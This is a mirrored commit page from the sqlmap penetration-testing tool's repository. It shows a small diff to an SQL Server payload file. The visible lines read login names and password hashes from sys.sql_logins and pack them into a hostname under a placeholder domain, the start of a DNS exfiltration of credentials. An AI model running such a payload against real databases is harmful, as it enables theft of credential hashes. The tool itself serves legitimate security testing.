mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-08-04 14:55:40 +00:00
minor update and refactoring
This commit is contained in:
parent
bf923a97df
commit
8d7912ad34
5 changed files with 21 additions and 5 deletions
|
|
@ -1,4 +1,4 @@
|
|||
# Reference: http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf
|
||||
# Reference: http://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf
|
||||
|
||||
DECLARE @host varchar(1024);
|
||||
SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;
|
||||
Loading…
Add table
Add a link
Reference in a new issue